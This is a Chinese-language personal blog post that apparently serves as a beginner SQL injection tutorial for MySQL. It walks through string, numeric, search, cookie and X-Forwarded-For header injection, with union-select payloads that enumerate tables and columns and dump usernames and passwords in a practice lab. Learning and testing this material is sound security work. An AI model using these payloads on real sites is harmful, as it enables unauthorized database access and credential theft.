<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wh1tecell.top","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="介绍几种常见的mysql注入类型">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入之mysql学习基础(二)">
<meta property="og:url" content="https://wh1tecell.top/2021/01/05/sql%E6%B3%A8%E5%85%A5%E4%B9%8Bmysql%E5%AD%A6%E4%B9%A0%E5%9F%BA%E7%A1%80(%E4%BA%8C)/index.html">
<meta property="og:site_name" content="Wh1tecell&#39;blog">
<meta property="og:description" content="介绍几种常见的mysql注入类型">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAayjJ.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAabDA.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAaj4f.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdibn.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdE5V.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdZCT.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdm2F.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAd1V1.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdt2D.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdgxg.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAd5aq.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdTiV.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdXL9.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAdzIx.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwPzD.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200618112825139.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwksH.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwALd.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwZdI.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwnFP.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAw1yQ.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwYoq.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwfSO.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sAwbkt.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sA0FhV.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sA0VcF.png">
<meta property="og:image" content="https://s3.ax1x.com/2021/01/05/sA0u7R.png">
<meta property="article:published_time" content="2021-01-05T11:58:15.000Z">
<meta property="article:modified_time" content="2021-01-05T15:33:43.808Z">
<meta property="article:author" content="Wh1tecell">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s3.ax1x.com/2021/01/05/sAayjJ.png">

<link rel="canonical" href="https://wh1tecell.top/2021/01/05/sql%E6%B3%A8%E5%85%A5%E4%B9%8Bmysql%E5%AD%A6%E4%B9%A0%E5%9F%BA%E7%A1%80(%E4%BA%8C)/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sql注入之mysql学习基础(二) | Wh1tecell'blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Wh1tecell'blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Wh1tecell'blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://wh1tecell.top/2021/01/05/sql%E6%B3%A8%E5%85%A5%E4%B9%8Bmysql%E5%AD%A6%E4%B9%A0%E5%9F%BA%E7%A1%80(%E4%BA%8C)/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Wh1tecell">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Wh1tecell'blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入之mysql学习基础(二)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-01-05 19:58:15 / 修改时间：23:33:43" itemprop="dateCreated datePublished" datetime="2021-01-05T19:58:15+08:00">2021-01-05</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/" itemprop="url" rel="index"><span itemprop="name">web技术学习</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web%E6%8A%80%E6%9C%AF%E5%AD%A6%E4%B9%A0/sql%E6%B3%A8%E5%85%A5/" itemprop="url" rel="index"><span itemprop="name">sql注入</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>介绍几种常见的mysql注入类型</p>
<a id="more"></a>

<h1 id="MySQL注入"><a href="#MySQL注入" class="headerlink" title="MySQL注入"></a>MySQL注入</h1><h2 id="基本介绍"><a href="#基本介绍" class="headerlink" title="基本介绍"></a>基本介绍</h2><h3 id="字符型"><a href="#字符型" class="headerlink" title="字符型"></a>字符型</h3><p>有这几种常见情况,闭合SQL语句，再插入我们需要的sql语句</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">$<span class="keyword">sql</span><span class="operator">=</span>&quot;SELECT * FROM users WHERE id= &#x27;$id&#x27;&quot;;</span><br><span class="line">闭合前面的单引号把后面的单引号注释掉跟上<span class="keyword">sql</span>语句</span><br><span class="line">$<span class="keyword">sql</span><span class="operator">=</span>&quot;SELECT * FROM users WHERE id=((&#x27;$id&#x27; ))</span><br><span class="line">闭合单引号，闭合两个括号把后面的都注释掉跟上sql语句</span><br><span class="line">$sql=&quot;<span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id<span class="operator">=</span>(<span class="string">&#x27;$id&#x27;</span>)&quot;;</span><br><span class="line">闭合单引号，闭合括号把后面的都注释掉跟上sql语句</span><br><span class="line">$id =&#x27;&quot;<span class="string">&#x27;.$id.&#x27;</span>&quot;&#x27;</span><br><span class="line">$sql = &quot;<span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id <span class="operator">=</span> $id&quot;;</span><br><span class="line">闭合前面的双引号再注释后面的双引号</span><br><span class="line">$id = &#x27;(&quot;<span class="string">&#x27;.$id.&#x27;</span>&quot;)&#x27;;</span><br><span class="line">$sql = &quot;<span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">WHERE</span> id <span class="operator">=</span> $id&quot;;</span><br><span class="line">1234567891011</span><br></pre></td></tr></table></figure>
<h3 id="数字型"><a href="#数字型" class="headerlink" title="数字型"></a>数字型</h3><p>字符型和数字型的区别在于接受的参数id的类型和数据库中id的字段类型<br>其实和字符型的注入方式是一样的，不必过度纠结于两者具体的区别</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$<span class="keyword">sql</span><span class="operator">=</span>&quot;SELECT * FROM users WHERE id=$id&quot;;</span><br></pre></td></tr></table></figure>
<h3 id="搜索型"><a href="#搜索型" class="headerlink" title="搜索型"></a>搜索型</h3><p>就是post型的提交方式<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAayjJ"><img src="https://s3.ax1x.com/2021/01/05/sAayjJ.png" alt="sAayjJ.png"></a></p>
<h3 id="Cookie注入"><a href="#Cookie注入" class="headerlink" title="Cookie注入"></a>Cookie注入</h3><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAabDA"><img src="https://s3.ax1x.com/2021/01/05/sAabDA.png" alt="sAabDA.png"></a></p>
<h3 id="HTTP头注入"><a href="#HTTP头注入" class="headerlink" title="HTTP头注入"></a>HTTP头注入</h3><p>X-Forwarded-For<br>X-Forwarded-For是HTTP头的一个字段。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准。类似的还有如下几种<br>X-Originating-IP: 127.0.0.1<br>X-Forwarded-For: 127.0.0.1<br>X-Remote-IP: 127.0.0.1<br>X-Remote-Addr: 127.0.0.1<br>Client-IP: 127.0.0.1<br>User-agent<br>用户代理(user agent)是记录软件程序的客户端信息的HTTP头字段，他可以用来统计目标和违规协议。在HTTP头中应该包含它，这个字段的第一个空格前面是软件的产品名称，后面有一个可选的斜杠和版本号。并不是所有的应用程序都会被获取到user-agent信息，但是有些应用程序利用它存储一些信息(如:购物车)。在这种情况下，我们就有必要研究下user-agent头存在的问题了。<br>Referer<br>Referer是另外一个当应用程序没有过滤存储到数据库时，容易发生SQL注入的HTTP头。它是一个允许客户端指定的可选头部字段，通过它我们可以获取到提交请求URI的服务器情况。<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAaj4f"><img src="https://s3.ax1x.com/2021/01/05/sAaj4f.png" alt="sAaj4f.png"></a></p>
<h2 id="具体实例"><a href="#具体实例" class="headerlink" title="具体实例"></a>具体实例</h2><h3 id="数字型注入"><a href="#数字型注入" class="headerlink" title="数字型注入"></a>数字型注入</h3><h4 id="一般类型"><a href="#一般类型" class="headerlink" title="一般类型"></a>一般类型</h4><p>因为不知道接收的id是1或者是”1”的形式我们先当成数字型注入<br>如何判断：’url?id=1+1’如果成功返回数据则为数字型注入<code>+</code>=<code>%2b</code><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdibn"><img src="https://s3.ax1x.com/2021/01/05/sAdibn.png" alt="sAdibn.png"></a><br>首先查字段<br>url?id = 1 order by 3 不报错<br>url?id = 1 order by 4 报错<br>所以有三个字段<br>接下来使用联合查询:<code>url?id = 1 union select 1,2,3</code><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdE5V"><img src="https://s3.ax1x.com/2021/01/05/sAdE5V.png" alt="sAdE5V.png"></a><br>查当前数据库名，版本，用户<br><code>url?id = 1 union select database(),version(),user()</code><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdZCT"><img src="https://s3.ax1x.com/2021/01/05/sAdZCT.png" alt="sAdZCT.png"></a><br>查询有什么表<br><code>url?id = 1 union select 1,2,table_name from infomation_schema.tables where table_schema = database()</code><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdm2F"><img src="https://s3.ax1x.com/2021/01/05/sAdm2F.png" alt="sAdm2F.png"></a><br>查询列名：<br><code>url?id = 1 union select 1,2,column_name from infomation_schema.columns where table_table = &#39;users&#39;</code><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAd1V1"><img src="https://s3.ax1x.com/2021/01/05/sAd1V1.png" alt="sAd1V1.png"></a><br>查询数据：<br><code>url?id = 1 union select id,username,password from users</code><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdt2D"><img src="https://s3.ax1x.com/2021/01/05/sAdt2D.png" alt="sAdt2D.png"></a></p>
<h4 id="被单引号包裹起来的"><a href="#被单引号包裹起来的" class="headerlink" title="被单引号包裹起来的"></a>被单引号包裹起来的</h4><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdgxg"><img src="https://s3.ax1x.com/2021/01/05/sAdgxg.png" alt="sAdgxg.png"></a><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAd5aq"><img src="https://s3.ax1x.com/2021/01/05/sAd5aq.png" alt="sAd5aq.png"></a><br>在之后我们拼接and 1=1 and 1= 2,发现没有报错<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdTiV"><img src="https://s3.ax1x.com/2021/01/05/sAdTiV.png" alt="sAdTiV.png"></a><br>之后加上<code>id = 1&#39;</code>单引号后报错，不正常说明sql语句可控<br>在Mysql中<code>--+</code>代表注释此时<code>id = 1&#39;--+</code>成功执行<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdXL9"><img src="https://s3.ax1x.com/2021/01/05/sAdXL9.png" alt="sAdXL9.png"></a><br>之后插上<code>id = 1 and 1=2&#39;-- +</code>不正常，即可食用之后类似上面一般类型</p>
<h4 id="双引号加小括号包裹"><a href="#双引号加小括号包裹" class="headerlink" title="双引号加小括号包裹"></a>双引号加小括号包裹</h4><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAdzIx"><img src="https://s3.ax1x.com/2021/01/05/sAdzIx.png" alt="sAdzIx.png"></a><br>首先查看<code>id = 1</code><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwPzD"><img src="https://s3.ax1x.com/2021/01/05/sAwPzD.png" alt="sAwPzD.png"></a><br>类似上面<code>?id = 1&#39;) and 1 = 2-- +</code>发现1=1和1=2成功执行</p>
<h4 id="两个括号"><a href="#两个括号" class="headerlink" title="两个括号"></a>两个括号</h4><p><img src="https://img-blog.csdnimg.cn/20200618112825139.png" alt="在这里插入图片描述"><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwksH"><img src="https://s3.ax1x.com/2021/01/05/sAwksH.png" alt="sAwksH.png"></a><br>采用<code>? id = 1&#39;)) union select 1,2,3 -- +</code></p>
<h3 id="字符型注入"><a href="#字符型注入" class="headerlink" title="字符型注入"></a>字符型注入</h3><p>如果在url后拼接<code>?id=1 and 1=1</code>or<code>and 1=2</code>分别正确错误则说明为字符型注入<br>注入方式和数字型类似</p>
<h3 id="搜索型注入"><a href="#搜索型注入" class="headerlink" title="搜索型注入"></a>搜索型注入</h3><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwALd"><img src="https://s3.ax1x.com/2021/01/05/sAwALd.png" alt="sAwALd.png"></a><br>%代表%前面可以有字符后面也可以有<br>配合HackBar食用<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwZdI"><img src="https://s3.ax1x.com/2021/01/05/sAwZdI.png" alt="sAwZdI.png"></a><br>post数据<code>name = a&#39; union select 1,2,3 -- +</code></p>
<h3 id="Cookie注入-1"><a href="#Cookie注入-1" class="headerlink" title="Cookie注入"></a>Cookie注入</h3><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwnFP"><img src="https://s3.ax1x.com/2021/01/05/sAwnFP.png" alt="sAwnFP.png"></a><br>配合Burp使用<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAw1yQ"><img src="https://s3.ax1x.com/2021/01/05/sAw1yQ.png" alt="sAw1yQ.png"></a><br>改为<code>Cookie: uid = 1 union select 1,2,3</code></p>
<h3 id="HTTP头注入-1"><a href="#HTTP头注入-1" class="headerlink" title="HTTP头注入"></a>HTTP头注入</h3><p><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwYoq"><img src="https://s3.ax1x.com/2021/01/05/sAwYoq.png" alt="sAwYoq.png"></a><br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwfSO"><img src="https://s3.ax1x.com/2021/01/05/sAwfSO.png" alt="sAwfSO.png"></a></p>
<p>配合Burp食用<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sAwbkt"><img src="https://s3.ax1x.com/2021/01/05/sAwbkt.png" alt="sAwbkt.png"></a><br>添加XFF头<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sA0FhV"><img src="https://s3.ax1x.com/2021/01/05/sA0FhV.png" alt="sA0FhV.png"></a><br>完美成功!!!<br><code>127.0.0.1&#39; order by 4-- +</code>成功，配合联合查询即可！！！<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sA0VcF"><img src="https://s3.ax1x.com/2021/01/05/sA0VcF.png" alt="sA0VcF.png"></a><br>看图<br><a target="_blank" rel="noopener" href="https://imgchr.com/i/sA0u7R"><img src="https://s3.ax1x.com/2021/01/05/sA0u7R.png" alt="sA0u7R.png"></a></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/01/05/sql%E6%B3%A8%E5%85%A5%E4%B9%8Bmysql%E5%AD%A6%E4%B9%A0%E5%9F%BA%E7%A1%80(%E4%B8%80)/" rel="prev" title="sql注入之mysql学习基础(一)">
      <i class="fa fa-chevron-left"></i> sql注入之mysql学习基础(一)
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/01/08/python%E4%B9%8B%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%89%8D%E9%9D%A2%E5%8A%A0u,r,f%E7%9A%84%E5%90%AB%E4%B9%89/" rel="next" title="python之字符串前面加u,r,f的含义">
      python之字符串前面加u,r,f的含义 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#MySQL%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">MySQL注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%BA%E6%9C%AC%E4%BB%8B%E7%BB%8D"><span class="nav-number">1.1.</span> <span class="nav-text">基本介绍</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B"><span class="nav-number">1.1.1.</span> <span class="nav-text">字符型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B"><span class="nav-number">1.1.2.</span> <span class="nav-text">数字型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%90%9C%E7%B4%A2%E5%9E%8B"><span class="nav-number">1.1.3.</span> <span class="nav-text">搜索型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Cookie%E6%B3%A8%E5%85%A5"><span class="nav-number">1.1.4.</span> <span class="nav-text">Cookie注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HTTP%E5%A4%B4%E6%B3%A8%E5%85%A5"><span class="nav-number">1.1.5.</span> <span class="nav-text">HTTP头注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%85%B7%E4%BD%93%E5%AE%9E%E4%BE%8B"><span class="nav-number">1.2.</span> <span class="nav-text">具体实例</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%95%B0%E5%AD%97%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.1.</span> <span class="nav-text">数字型注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E8%88%AC%E7%B1%BB%E5%9E%8B"><span class="nav-number">1.2.1.1.</span> <span class="nav-text">一般类型</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E8%A2%AB%E5%8D%95%E5%BC%95%E5%8F%B7%E5%8C%85%E8%A3%B9%E8%B5%B7%E6%9D%A5%E7%9A%84"><span class="nav-number">1.2.1.2.</span> <span class="nav-text">被单引号包裹起来的</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8C%E5%BC%95%E5%8F%B7%E5%8A%A0%E5%B0%8F%E6%8B%AC%E5%8F%B7%E5%8C%85%E8%A3%B9"><span class="nav-number">1.2.1.3.</span> <span class="nav-text">双引号加小括号包裹</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%A4%E4%B8%AA%E6%8B%AC%E5%8F%B7"><span class="nav-number">1.2.1.4.</span> <span class="nav-text">两个括号</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%AD%97%E7%AC%A6%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.2.</span> <span class="nav-text">字符型注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%90%9C%E7%B4%A2%E5%9E%8B%E6%B3%A8%E5%85%A5"><span class="nav-number">1.2.3.</span> <span class="nav-text">搜索型注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Cookie%E6%B3%A8%E5%85%A5-1"><span class="nav-number">1.2.4.</span> <span class="nav-text">Cookie注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#HTTP%E5%A4%B4%E6%B3%A8%E5%85%A5-1"><span class="nav-number">1.2.5.</span> <span class="nav-text">HTTP头注入</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Wh1tecell</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">27</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Wh1tecell</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
